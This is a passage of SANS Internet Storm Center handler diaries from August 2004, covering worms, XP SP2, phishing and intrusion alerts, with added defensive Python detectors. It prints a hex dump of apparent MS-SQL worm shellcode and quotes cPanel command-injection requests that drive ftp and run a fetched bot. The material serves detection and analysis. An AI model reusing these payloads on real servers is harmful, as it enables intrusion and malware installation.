0x00f0 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend....B.E.P..
0x0100 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.E.P.E.P..P....
0x0110 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U..Qt.....
0x0120 42ff 16ff d031 c951 5150 81f1 0301 049b B....1.QQP......
0x0130 81f1 0101 0101 518d 45cc 508b 45c0 50ff ......Q.E.P.E.P.
0x0140 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j...P.E.P.E
0x0150 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 .P........<a...E
0x0160 b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ...@...........)
0x0170 c28d 0490 01d8 8945 b46a 108d 45b0 5031 .......E.j..E.P1
0x0180 c951 6681 f178 0151 8d45 0350 8b45 ac50 .Qf..x.Q.E.P.E.P
0x0190 ffd6 ebca ....

[**] [1:2050:5] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/12-21:39:30.585849 -> xx.xx.xx.104:1434
UDP TTL:112 TOS:0x0 ID:18373 IpLen:20 DgmLen:404
Len: 376

[Xref => http://cgi.nessus.org/plugins/dump.php3?id=10674]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649]
[Xref => http://www.securityfocus.com/bid/5310]
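
An added detector in the spirit of that Snort alert (my example, not Snort's rule or the ISC's code): it rebuilds a datagram from tcpdump -X style hex lines, parses the IPv4 and UDP headers, and flags a UDP/1434 request that opens with SSRP type 0x04 and is far longer than any legitimate instance-name lookup. The packets are constructed for the example with RFC 5737 addresses and zeroed checksums, and the length threshold is an assumption.

```python
import re
import struct
from typing import Optional, Tuple

MSSQL_RESOLUTION_PORT = 1434  # SQL Server Resolution Service, UDP


def parse_ipv4_udp(pkt: bytes) -> Optional[Tuple[int, int, bytes]]:
    """(src_port, dst_port, udp_payload) from a raw IPv4 datagram, or None if not IPv4/UDP."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 17 or len(pkt) < ihl + 8:
        return None
    pkt = pkt[:total_len]  # drop link-layer padding or hex-dump trailer bytes
    sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    return sport, dport, pkt[ihl + 8:ihl + ulen]


def is_mssql_version_overflow(pkt: bytes, min_len: int = 100) -> bool:
    """Flag a UDP/1434 datagram that starts with SSRP request type 0x04 and is
    far larger than an instance-name query (min_len is an assumed threshold)."""
    parsed = parse_ipv4_udp(pkt)
    if parsed is None:
        return False
    _, dport, payload = parsed
    return dport == MSSQL_RESOLUTION_PORT and len(payload) >= min_len and payload[:1] == b"\x04"


_HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2}(?:[0-9a-fA-F]{2})?$")


def parse_tcpdump_hex(text: str) -> bytes:
    """Rebuild packet bytes from 'tcpdump -X' style lines: '0x0010 xxxx xxxx ... ASCII'.
    The ASCII column is recognised as the first non-hex token; a short last line
    whose ASCII happens to be hex-only is caught by the IP total-length check."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not tokens[0].lower().startswith("0x"):
            continue
        for tok in tokens[1:9]:  # at most 8 two-byte groups per line
            if not _HEX_GROUP.match(tok):
                break
            out += bytes.fromhex(tok)
    return bytes(out)


def tcpdump_hex(pkt: bytes) -> str:
    """Render bytes in the same 'tcpdump -X' layout (used here to build the sample)."""
    lines = []
    for off in range(0, len(pkt), 16):
        chunk = pkt[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"0x{off:04x} {groups:<39} {text}")
    return "\n".join(lines)


def build_ipv4_udp(src: bytes, dst: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal IPv4+UDP framing with checksums left at zero (constructed sample only)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x47C5, 0, 112, 17, 0, src, dst)
    return ip + udp


# Constructed samples: a 376-byte 0x04-led request like the one above, and a
# normal one-byte SSRP enumeration ping.
_SRC, _DST = bytes([192, 0, 2, 1]), bytes([198, 51, 100, 104])
SAMPLE_OVERFLOW = build_ipv4_udp(_SRC, _DST, 1185, 1434, b"\x04" + b"\x01" * 375)
SAMPLE_PING = build_ipv4_udp(_SRC, _DST, 1185, 1434, b"\x02")

if __name__ == "__main__":
    dump = tcpdump_hex(SAMPLE_OVERFLOW)
    print(dump.splitlines()[0])
    print("overflow:", is_mssql_version_overflow(parse_tcpdump_hex(dump)))
    print("ping:", is_mssql_version_overflow(SAMPLE_PING))
```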

Don't forget to check out DShield and learn how you too can begin to submit sanitized logs and get your own report page. To find out more, visit:


Make use of the ISC data. You can run searches, view trends and gather reports from the following URLs:



Mike Poor

< -- mike [at] intelguardians.com -- >

Handler on Duty signing off



Published: 2004-08-12

SP2 breaks nmap, others - *Anti*phishing - Application exploits

nmap non-functional under XP SP2

The extremely popular port-scanner "nmap" became an early victim of XP SP2 today when Fyodor, nmap's author, announced that the tool does not function under Windows XP Service Pack 2. This is due to the removal of XP's innate ability to send TCP packets over "raw" sockets. This is likely a temporary situation, as nmap is fully functional on platforms without native raw socket support.


Remember, we're still sharing our SP2 experiences at the following link:


Antiphishing.org report for June

Since it wouldn't be a proper handler's diary without something phishing-related ... Antiphishing.org has released its monthly report outlining which companies were targeted by phishing attacks most often, which countries hosted the most phishing sites, the average lifespan of a phishing site, and many more interesting findings.*


CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\x20';BLA2=$'\x2F';echo${BLA}-e${BLA}\nquit\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:

GET /resetpass/?user=%7C%60BLA=$'\x20';BLA2=$'\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks. As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker. Besides the (usually) softer target, application attacks have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls. Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.
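
The two requests above are shell command injection through a query parameter: %7C%60 and %60%7C decode to |` and `|, so the value becomes a command substitution, and bash ANSI-C quoting ($'\x20' for a space, $'\x2F' for a slash) keeps spaces and slashes out of the URL so neither the request line nor a naive filter trips on them. The Python below is an added example, not code from the diary or from cPanel: it percent-decodes the user parameter, recognises the |`...`| wrapper, simulates the variable assignments without executing anything, and returns the commands the target shell would actually run. The first two request lines are the ones quoted above; the third is a benign control constructed here. The mini-parser only handles the constructs these payloads use (assignments, ${VAR} references, ; separators, $'...' quoting).

```python
import re
from urllib.parse import unquote

# The two request lines quoted in the diary, plus a benign request
# constructed here as a control.
SAMPLE_REQUESTS = [
    "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}"
    "\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0",
    "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0",
    "GET /resetpass/?user=alice HTTP/1.0",
]

ANSI_C_QUOTE = re.compile(r"\$'((?:\\.|[^'\\])*)'")          # bash $'...'
ASSIGNMENT = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", re.S)
VARREF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)")
INJECTION_WRAPPER = re.compile(r"\|`(.*)`\|", re.S)           # |`...`| once decoded


def query_param(request_line, name):
    """Percent-decoded value of one query parameter from an HTTP request line."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None
    _path, _, query = target.partition("?")
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == name:
            return unquote(value)
    return None


def split_statements(script):
    """Split on ';' outside single quotes (sufficient for these payloads)."""
    out, buf, quoted = [], [], False
    for ch in script:
        if ch == "'":
            quoted = not quoted
        if ch == ";" and not quoted:
            out.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    out.append("".join(buf))
    return [s for s in out if s.strip()]


def expand_ansi_c(s):
    """Replace $'\\x20'-style quoting with the characters it denotes."""
    return ANSI_C_QUOTE.sub(
        lambda m: m.group(1).encode("latin-1").decode("unicode_escape"), s)


def reveal_injected_shell(value):
    """Return the commands the shell would run for a |`...`| payload, or None."""
    m = INJECTION_WRAPPER.fullmatch(value)
    if not m:
        return None
    env, commands = {}, []
    for stmt in split_statements(m.group(1)):
        stmt = expand_ansi_c(stmt)
        a = ASSIGNMENT.match(stmt)
        if a:                       # NAME=value: remember it, never execute it
            env[a.group(1)] = a.group(2)
            continue
        # Substitute ${NAME}/$NAME from the simulated environment.
        commands.append(VARREF.sub(
            lambda v: env.get(v.group(1) or v.group(2), ""), stmt))
    return commands


def analyse_request(request_line):
    """None for a benign request, else the list of injected commands."""
    value = query_param(request_line, "user")
    return None if value is None else reveal_injected_shell(value)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.split(" ")[1], "->", analyse_request(req))
```

Run against the diary's two requests this yields `echo -e \nquit\n | ftp -n` (the reconnaissance step, an FTP session driven from the injected shell) and `./bot` (running what was fetched); the benign request yields None. The same decoding is what you want in a web-log review: match on the decoded value, not on the percent-encoded request, or the $'\x20' trick walks straight past a signature that looks for spaces.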


Cory Altheide

Handler on Duty


*Just to clarify, I mean that there are many more findings that are interesting, not many other findings that are more interesting than the ones I've mentioned already. I really wish the English language allowed for the use of parentheses in the manner algebra does = (many more) (interesting findings) vs. many (more interesting findings).


Published: 2004-08-11

Libpng exploit / XP SP2 yet / New MyDoom? / More phishing / ISC Webcast / Corporate Policy

Libpng Exploit

A post today on the Bugtraq mailing list contains what is claimed to be an exploit for the libpng vulnerability announced a few days ago.

Reference: http://isc.sans.org/diary.php?date=2004-08-04

XP SP2 yet...

So, did you survive the day after XP SP2? Share your experience with us at http://isc.sans.org/xpsp2.php .

Microsoft released a document listing the top 10 reasons to deploy SP2. Deploy or not? Check it here: http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2top.mspx

New MyDoom ?

We received two posts asking whether we were aware of a new MyDoom variant. According to the posts, the new variant is spreading in China and will be in the wild within hours. We are not aware of any new worm variant (yet).

More phishing

More and more phishing every day. The example below was sent by Ryan Barnett. It is a phish targeting US Bank and uses two techniques to obfuscate the fake URLs:


Decoded -


Decoded -

SANS ISC Webcast

Did you miss today's ISC webcast? Check the archive at: http://www.sans.org/webcasts/show.php?webcastid=90491

Corporate Policy...

Today you have something extra to watch: Microsoft's official web-based MSN Messenger was released. If your corporate policy says users are not allowed to use IM and you already block the clients, watch out for web-based IM. It may bypass your IM filters and let the traffic into your network.

Some web-based services are well known, such as msn2go.com and msn2go.com.br, and now there is http://webmessenger.msn.com/ . Good luck!


Handler on Duty: Pedro Bueno (bueno/AT/ieee.org)


Published: 2004-08-10

Windows XP SP2 Experience Forum / Exchange 5.5 Security Bulletin / Mac OS X Bulletins

Special Note: Internet Storm Center Webcast

Today (Wednesday) at 14:00 EST / 20:00 CEST. For details, see

Note that this webcast will start one hour later than most of our other SANS webcasts.

Windows XP SP2 Experience Forum

Windows XP Service Pack 2 was officially released to the world yesterday (as noted in yesterday's Handlers Diary and numerous other trade magazines and websites). While most users should not have significant problems with SP2, others stumble upon cases where home grown web applications or other 3rd party software may not work properly after installation. The Internet Storm Center has set up a forum to collect the experiences of others in the security community. It is the hope of the ISC that users will be able to share information on problems they have encountered and/or steps they used to help remedy these issues. If you would like to submit your experiences, please see the following URL:

Microsoft Exchange 5.5 Security Bulletin (MS04-026)

Today is the regularly scheduled Microsoft patch day. While most people are focused on Windows XP SP2, those running Exchange 5.5 need to take heed of today's security bulletin. An update was released to resolve a cross-site scripting problem in the Outlook Web Access component of Exchange 5.5 that lets an attacker trick users into running malicious script. Though the bulletin rates the severity as only Moderate, it is still wise to patch your Exchange 5.5 servers at the earliest maintenance window administrators have available. There are plenty of "click-happy" end users who could create headaches for administrators if attackers start using this vulnerability in junk or malicious e-mail. Also, keep raising security awareness about clicking on links or attachments without thinking. For more technical information on the vulnerability and the available patch, please see the following URL:

Apple Mac OS X Bulletins (APPLE-SA-2004-08-09)

Yesterday, two bulletins were released by Apple. The first involves the libpng (Portable Network Graphics) vulnerability that has prompted numerous patches in the Unix and Linux world over the past two weeks. The Mac OS X CoreGraphics and AppKit frameworks have been updated to protect against the flaws in the reference library. The software update is available for these versions of OS X:
* Mac OS X v10.3.4 "Panther"

* Mac OS X Server v10.3.4 "Panther"

* Mac OS X v10.2.8 "Jaguar"

* Mac OS X Server v10.2.8 "Jaguar"
The second bulletin announced the availability of Mac OS X v10.3.5. The new version of OS X includes the patch for libpng, and also includes security updates for the Safari web browser and the TCP/IP stack (the Rose fragmentation attack).
For more information on either of these, please see the following URLs:



Scott Fendley - Handler on Duty

University of Arkansas

scottf /at/ uark /dot/ edu


Published: 2004-08-09

New Bagle Variant Spreading

New Bagle Variant Spreading

There is a new Bagle mass-mailing virus variant on the loose.

The attachment may have one of the following file names:









According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and is started at logon through the win_upd2.exe value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


The virus downloads part of itself from a list of known web sites. Blocking the following sites at your perimeter can mitigate the risk of this virus:


AV vendors have created signatures for this Bagle variant.

Mcafee: Bagle.aq

Trendmicro: Bagle.ac

Symantec: Bagle.ao

Snort signature for this virus is also available on Bleeding Snort (submitted by Matt Jonkman). http://www.bleedingsnort.com

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Bagle Variant Requesting 2.jpg"; reference:url,http.isc.sans.org/diary.php?date=2004-08-09; content:"GET /2.jpg"; sid:2001061; rev:3;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Bagle Variant Checking In"; reference:url,vil.nai.com/vil/content/v_127423.htm; uricontent:"/spyware.php"; sid:2001064; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"BLEEDING-EDGE VIRUS Possible Bagle.AQ Worm Outbound"; content:"filename="; pcre:"m/(price2|new_price|08_price|newprice|new_price|price_new|price|price_08).zip/"; nocase; sid:2001065; rev:1;)

Microsoft Windows XP SP2 is out!

Microsoft has released Service Pack 2 for Windows XP. It is not only a cumulative patch for XP but also adds functionality, including many security features (such as the firewall and Internet Explorer hardening).

For the new features:


Information on SP2:

AOL Instant Messenger URI Handler Buffer Overflow

A vulnerability exists in AIM: a stack-based buffer overflow in the handling of "away" messages. Successful exploitation allows malicious code to run on the user's system.

The vulnerability has been confirmed in version 5.5.3595. Other versions may also be affected. Mitigation includes upgrading to the latest beta version of the AIM software or using the workaround posted on www.aim.com.




Jason Lam, jason /at/ networksec.org


Published: 2004-08-08

Mixed bag for a quiet Sunday


Since today was a pretty quiet day, I'm going to take the opportunity to share a few random thoughts. I saw a presentation the other day on some uses of Google for, shall we say, nefarious purposes. While the search engines are very useful, they can be useful to the "bad guys", too. The recent worms that took advantage of various search engines are only the tip of the iceberg. One of the things that this did remind me of, though, was to be careful about what information about you appears on web sites that can be indexed by the various search engines.

A new book

Second, I've just started reading a new book, _The Tao of Network Security Monitoring_ by Richard Bejtlich, a computer security professional who is well-known to many of the handlers (I had the pleasure of attending SANS 2000 and SANSFIRE 2001 with him, though I'm sure he doesn't remember me). So far, it looks pretty interesting, I may include more of a report on it when I finish.


We, the handlers at the Internet Storm Center, could not do what we do without the continued support of the thousands of you out there who submit your logs to Dshield. As always, if you haven't been contributing, we urge you to consider it. See

http://www.dshield.org/howto.php .


The next major SANS conference is NS2004 in Las Vegas 29 Sept-4 Oct. The early bird discount deadline is 18 August. There will be 17 tracks and a number of evening, one- and two-day classes all led by some of the best SANS faculty including a number of handlers and some of the rest of us will be there as participants. I look forward to seeing some of you there.


Jim Clausing, jim.clausing/at/acm.org


Published: 2004-08-07

Mailbag; Upgrade Mozilla Products; Reading Corner


We continue to receive submissions on the SSH brute-force scans. In one of the submissions, the source is a public web site whose phpinfo() output can be viewed. This is a bad move: it lets anyone see not only the PHP configuration but also some of the software installed on the system and its versions. This file should be removed once you have verified that PHP is installed properly. We have informed the site so it can investigate.

Upgrade Mozilla Products

Mozilla has released new versions of its products to fix the libpng vulnerability. If you use Mozilla products, upgrade them over the weekend:


For more details on the libpng vulnerability, see:

Reading Corner

NIST has published draft guidelines on PDA forensics. Over the weekend, you may want to take a look:



Published: 2004-08-06

XP SP2 Release to manufacturing, and Continued Scanning Trends

XP SP2 Release to manufacturing, and Continued Scanning Trends

SSH scans continue to search out machines with default or weak passwords. Below is a URL to a post showing what can happen once one of these brute-force attempts succeeds.


Microsoft XP SP2 released to Manufacturing.

Microsoft released XP SP2 to Manufacturing today, paving the way to public release at the end of the month. This Service Pack has been available in beta form for a good while already, with mixed reviews. While there are many security fixes in this update, one of the main improvements is that the Windows Personal Firewall will be turned on by default. This does not change the fact that the firewall assumes that if you have an open port, you expect to have that port open on the firewall :-(


According to Microsoft's web site, XP SP2 is scheduled to be released this month:

Aug 2, 2004: Windows XP SP 2 Release Candidate 2 (RC2) Removed from the Web

This signifies the end of the pre-release distribution program in
anticipation of the final release of SP2. Windows XP SP2 remains on
schedule for release this month.

We recommend that you not install the RC2 version of SP2 on computers that
are running the latest security updates. Instead, install the final version
of Windows XP SP2 when it becomes available. Installing the RC2 version of
SP2 on computers that already have the latest security updates installed
can cause incompatibilities. The final release of SP2 will be compatible
with all previously installed security updates.

SSH Scans, Microsoft Ports, and Botnet Scans in continuous mode

There have been spikes in port 2745 traffic over the last couple of days. This is the backdoor port used by Bagle.E and its variants. The increase may be due to continued infection, or to bots scanning for the backdoor left behind by the various pieces of malware. Again, quoting the great Tom Liston... 2004 has been a malware festival!


I also continue to see botnet scans for M$ ports, as well as the usual bagle, mydoom, sasser, dabber and other ports. Examples below:

21:32:54.748297 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.775112 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.840363 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.871901 > FOO.FOO.104.1025: S 1875169154:1875169154(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.155331 > FOO.FOO.104.445: S 1875355067:1875355067(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.206019 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.210355 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.216125 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.221793 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.445722 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.448958 > FOO.FOO.104.1025: S 1875169154:1875169154(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.759457 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.763985 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.769704 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.775256 > FOO.FOO.104.445: S 1875355067:1875355067(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.930484 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.110472 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.192764 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.200454 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:57.836363 > FOO.FOO.104.445: S 1875232866:1875232866(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:58.055892 > FOO.FOO.104.445: S 1875311927:1875311927(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:58.059089 > FOO.FOO.104.3127: S 1875590101:1875590101(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)

Learn to catch hackers and detect and analyze malicious traffic

SANS New England is coming to Boston Monday September 13, 2004 - Saturday September 18, 2004. I will be teaching the Intrusion Detection class, and from what I hear, class sizes will be small. This is a great opportunity to get hands-on training in a more comfortable environment. Follow the link below for a detailed description:

Mike Poor [ mike <at> intelguardians.com ]


Published: 2004-08-05

Sun JRE Privilege Escalation, Opera Vulnerability, Pocket PC Trojan in the wild

Sun Java Runtime Environment Privilege Escalation Vulnerability

Sun released an advisory today indicating that the XSLT processor in their Java Runtime Environment doesn't properly separate privileges between applets. This could lead to cross-applet data leakage and possible applet privilege escalation. An updated JRE is available.


Opera Location Object Exploit

Looks like Phishing isn't just for Internet Explorer anymore! GreyMagic Software released an advisory today detailing a flaw in the Opera web browser which would allow an attacker to write arbitrary data to the "location" object. This has many possible repercussions, including allowing an attacker read access to arbitrary files on the victim's machine, and the ever popular URL spoofing enjoyed by phishermen around the globe. An upgrade which addresses this issue is available now.



Pocket PC Trojan Found In the Wild

... by an antivirus company, Kaspersky Labs. Either way, this is an interesting development and indicates that the race to own the mobile PCs of the world is well underway. Details on "Backdoor.WinCE.Brador.a" are available at Viruslist.


While by no means sophisticated, Brador highlights a problem which I believe will become more and more pronounced as PDAs become more ubiquitous. Who in their right mind would distrust their (smart) phone, after all? As perimeter security (slowly but surely) improves, attackers will look for alternate entry points. The classic dial-in backdoor is still far too common, although not to the levels of days past. The PDA, though, could prove to be the perfect soft target. They're usually highly insecure by default, and are allowed to waltz right past the firewall and join the network, no questions asked. Add innate wireless capabilities, often via 802.11b, Bluetooth, and infrared, and a little-known autorun "feature" (highlighted at last week's Black Hat and DefCon security conferences) and you've got an easily owned vector for $CODE_OF_YOUR_CHOICE.


Cory Altheide




Published: 2004-08-04

Libpng and putty vulnerabilities announced today

Libpng Vulnerability:
Proof-of-concept code for a buffer overflow in libpng was released today. A patched version is available (libpng 1.2.6rc1).

US CERT announcement: http://www.uscert.gov/cas/techalerts/TA04-217A.html

In other vulnerability news: PuTTY 0.54 and below

Details available at the author’s website: http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html

CORE's analysis:

The latest version, 0.55 is available at: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html


WinSCP, which uses code from PuTTY, has also been updated in response to the above vulnerability.


MyDoom.P Snort signatures are available at Bleeding Snort.


Remember that oinkmaster can update your snort rules daily from bleedingsnort.com! I use this on the honeynet at home and the test snort server at work.

On individual response to phishing emails:
Phishing incidents are on the rise. The handlers are receiving more and more reports of suspicious emails. My recommended response procedure is as follows:

i) report the email to the impersonated company’s abuse address (typically this is abuse@victimdomain.) Include a copy of the email and the full delivery headers. Their teams will use this information to determine the source of the email, and the location of the collection server.

ii) report the incident to antiphishing.org. They are scientifically tracking these incidents and organizing responses.

SSH Brute force reporting update:

Reports of SSH scans with simple username/password combinations continue to come in. We are currently looking for the tool/malicious code that is performing these scans.

Kevin Liston,
Handler on Duty,
kliston AT greenman-consulting DOT com


Published: 2004-08-03

New MyDoom In The Wild

An apology

It was my intention to post Part II of my "Follow the Bouncing Malware" article today. Instead, the other Handlers and I ended up following the bouncing MyDoom. A quick note of thanks to all of the other Handlers, the AV Vendors, and many others for pitching in and keeping this one from getting out of control. (TL)

New MyDoom On The Loose

Initial analysis (we will update as we know more):

Currently (16:00GMT), signatures are not yet available.


- Signatures are starting to come out, identifying this as MyDoom.O, MyDoom.P or Evaman.C

- It appears that this may only work on Win2K and WinXP machines because the executable requires psapi.dll.

- Copies itself to the Windows' system directory as winlibs.exe and installs itself under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

UPDATED (17:30GMT) - *BETA* Snort Sigs:

UPDATED (17:40GMT) - *BETA #2* Snort Sigs:

UPDATED (19:30GMT) - *BETA #3* Snort Sigs:

var YAHOO []
#var YAHOO any
pass tcp any any -> $YAHOO 80 (msg: "Beta - MyDoom.P yahoo email address search";\
sid:900018; rev:4; flow:established,to_server; flags:A+;\
flowbits:set,search_uri; content: "/py/psSearch.py|3f|";)
alert tcp any any -> $YAHOO 80 (msg: "Beta - MyDoom.P yahoo email address search";\
sid:900018; rev:4; flow:established,to_server; flags:A+;\
flowbits:isset,search_uri; content: "Host|3a| EMAIL.PEOPLE.YAHOO.COM";)

Targets Yahoo's people search:


NEW (1700GMT)- Example packet capture:

12:23:22.922862 > P 5:310(305) ack 1 win 17520 (DF)
0x0000 4500 0159 0077 4000 8006 96ba 0a01 0081 E..Y.w@.........
0x0010 d86d 7f7e 040b 0050 2217 187c 6b8a 5eb1 .m.~...P"..|k.^.
0x0020 5018 4470 46c9 0000 2f70 792f 7073 5365 P.DpF.../py/psSe
0x0030 6172 6368 2e70 793f 4669 7273 744e 616d arch.py?FirstNam
0x0040 653d 4a61 6d69 6526 696e 6465 783d 2048 e=Jamie&index=.H
0x0050 5454 502f 312e 300d 0a41 6363 6570 743a TTP/1.0..Accept:
0x0060 2069 6d61 6765 2f67 6966 2c20 696d 6167 .image/gif,.imag
0x0070 652f 782d 7862 6974 6d61 702c 2069 6d61 e/x-xbitmap,.ima
0x0080 6765 2f6a 7065 672c 2069 6d61 6765 2f70 ge/jpeg,.image/p
0x0090 6a70 6567 2c20 6170 706c 6963 6174 696f jpeg,.applicatio
0x00a0 6e2f 766e 642e 6d73 2d65 7863 656c 2c20 n/vnd.ms-excel,.
0x00b0 6170 706c 6963 6174 696f 6e2f 6d73 776f application/mswo
0x00c0 7264 2c20 6170 706c 6963 6174 696f 6e2f rd,.application/
0x00d0 766e 642e 6d73 2d70 6f77 6572 706f 696e vnd.ms-powerpoin
0x00e0 742c 202a 2f2a 0d0a 4163 6365 7074 2d4c t,.*/*..Accept-L
0x00f0 616e 6775 6167 653a 2065 6e2d 7573 0d0a anguage:.en-us..
0x0100 4163 6365 7074 2d45 6e63 6f64 696e 673a Accept-Encoding:
0x0110 2067 7a69 702c 2064 6566 6c61 7465 0d0a .gzip,.deflate..
0x0120 5573 6572 2d41 6765 6e74 3a20 4d6f 7a69 User-Agent:.Mozi
0x0130 6c6c 612f 342e 300d 0a48 6f73 743a 2045 lla/4.0..Host:.E
0x0140 4d41 494c 2e50 454f 504c 452e 5941 484f MAIL.PEOPLE.YAHO
0x0150 4f2e 434f 4d0d 0a0d 0a O.COM....
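
To show what is actually in that capture, the Python below (an added example, not part of the diary) rebuilds the bytes from the tcpdump -x hex columns, walks the IPv4 and TCP headers using the IHL and data-offset fields, and pulls out the HTTP request line and headers. Note the segment is 5:310: the "GET " (sequence bytes 1 to 4) went out in an earlier segment, so this payload starts at "/py/psSearch.py". A single-packet content match on "GET /py/psSearch" would miss this packet; matching on the URI fragment and the Host header, as the beta rules above do, does not. The final check re-implements that two-part test.

```python
import re

# The packet as printed by tcpdump -x in the diary.
HEXDUMP = """\
0x0000 4500 0159 0077 4000 8006 96ba 0a01 0081 E..Y.w@.........
0x0010 d86d 7f7e 040b 0050 2217 187c 6b8a 5eb1 .m.~...P"..|k.^.
0x0020 5018 4470 46c9 0000 2f70 792f 7073 5365 P.DpF.../py/psSe
0x0030 6172 6368 2e70 793f 4669 7273 744e 616d arch.py?FirstNam
0x0040 653d 4a61 6d69 6526 696e 6465 783d 2048 e=Jamie&index=.H
0x0050 5454 502f 312e 300d 0a41 6363 6570 743a TTP/1.0..Accept:
0x0060 2069 6d61 6765 2f67 6966 2c20 696d 6167 .image/gif,.imag
0x0070 652f 782d 7862 6974 6d61 702c 2069 6d61 e/x-xbitmap,.ima
0x0080 6765 2f6a 7065 672c 2069 6d61 6765 2f70 ge/jpeg,.image/p
0x0090 6a70 6567 2c20 6170 706c 6963 6174 696f jpeg,.applicatio
0x00a0 6e2f 766e 642e 6d73 2d65 7863 656c 2c20 n/vnd.ms-excel,.
0x00b0 6170 706c 6963 6174 696f 6e2f 6d73 776f application/mswo
0x00c0 7264 2c20 6170 706c 6963 6174 696f 6e2f rd,.application/
0x00d0 766e 642e 6d73 2d70 6f77 6572 706f 696e vnd.ms-powerpoin
0x00e0 742c 202a 2f2a 0d0a 4163 6365 7074 2d4c t,.*/*..Accept-L
0x00f0 616e 6775 6167 653a 2065 6e2d 7573 0d0a anguage:.en-us..
0x0100 4163 6365 7074 2d45 6e63 6f64 696e 673a Accept-Encoding:
0x0110 2067 7a69 702c 2064 6566 6c61 7465 0d0a .gzip,.deflate..
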